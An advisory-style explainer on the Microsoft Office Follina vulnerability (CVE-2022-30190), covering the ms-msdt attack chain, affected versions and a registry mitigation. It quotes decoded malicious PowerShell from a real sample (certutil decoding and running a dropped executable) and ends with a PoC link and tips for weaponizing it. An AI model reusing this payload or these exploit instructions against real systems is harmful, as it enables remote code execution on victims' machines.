Microsoft Office CVE-2022-30190 Vulnerability (Follina) Exploitation

What Is the Microsoft Office CVE-2022-30190 Follina Vulnerability?

nao_sec cyber security research team discovered a malicious Word document that downloads an HTML file and abuses Microsoft Support Diagnostic Tool (ms-msdt) to execute PowerShell commands on May 27th, 2022. An example attack follows these steps:

• Adversaries craft a malicious Word document that contains an external reference to a remote HTML file.
• The remote HTML file contains a script that causes the Word to spawn the ms-msdt process.
• The spawned ms-msdt process runs the Base-64 encoded PowerShell commands that are crafted by the adversaries.
• When a user interacts with it, the malicious document executes commands on the victim system.
• If the malicious document is a .doc file, the user needs to click on it for execution.
• If the malicious document is a .rtf file, hovering on it for preview is enough for execution.

$cmd = "c:\windows\system32\cmd.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

Example 1: Decoded PowerShell command exploiting Follina Vulnerability [3]

Even if users disable macros or use Protected View, the adversaries can exploit the Follina vulnerability.

What Is the Impact of the Microsoft Office CVE-2022-30190 Follina Vulnerability?

Microsoft Office is widely used worldwide; any vulnerability found in Office can potentially be exploited in impactful cyberattack campaigns. The Follina exploit allows attackers to run remotely hosted code with little interaction from the victim user. Therefore, cyber threat actors can exploit the Follina vulnerability as an initial access technique.

Which Versions of Microsoft Office Are Affected?

The MSDT Remote Code Execution (Follina) vulnerability currently affects Microsoft Office 2013, 2016, 2019, and 2021 and there is no patch available at the moment.

What Should You Do?

Proof-of-concept (PoC) codes for exploiting the Follina vulnerability are publicly available; security teams should expect exploitation attempts via malicious email attachments. 

How to Disable the MSDT URL Protocol?

Disabling MSDT URL protocol prohibits troubleshooters from being launched as links, including links within the operating system itself. These troubleshooters can still be accessed through the Get Help application and the system settings as supplementary or alternative troubleshooters. In order to disable the MSDT URL protocol:

1- Run Command Prompt as Administrator.
2- Backup the registry key: Execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename“
3- Delete the registry key: Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”

Exploit

Exploit Link:- https://github.com/onecloudemoji/CVE-2022-30190
CVE-2022-30190 Follina POC

Host exploit.html on localhost, port 80. Open the docx to pop calc.

To change the remote address the doc points to, open in 7Z and edit word\rels\document.xml.rels to point to a new location. YOU MUST keep the exclamation mark. It will literally not run if you omit this from the end of the URL.

The exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. There is about 6000 or so included in the exploit.html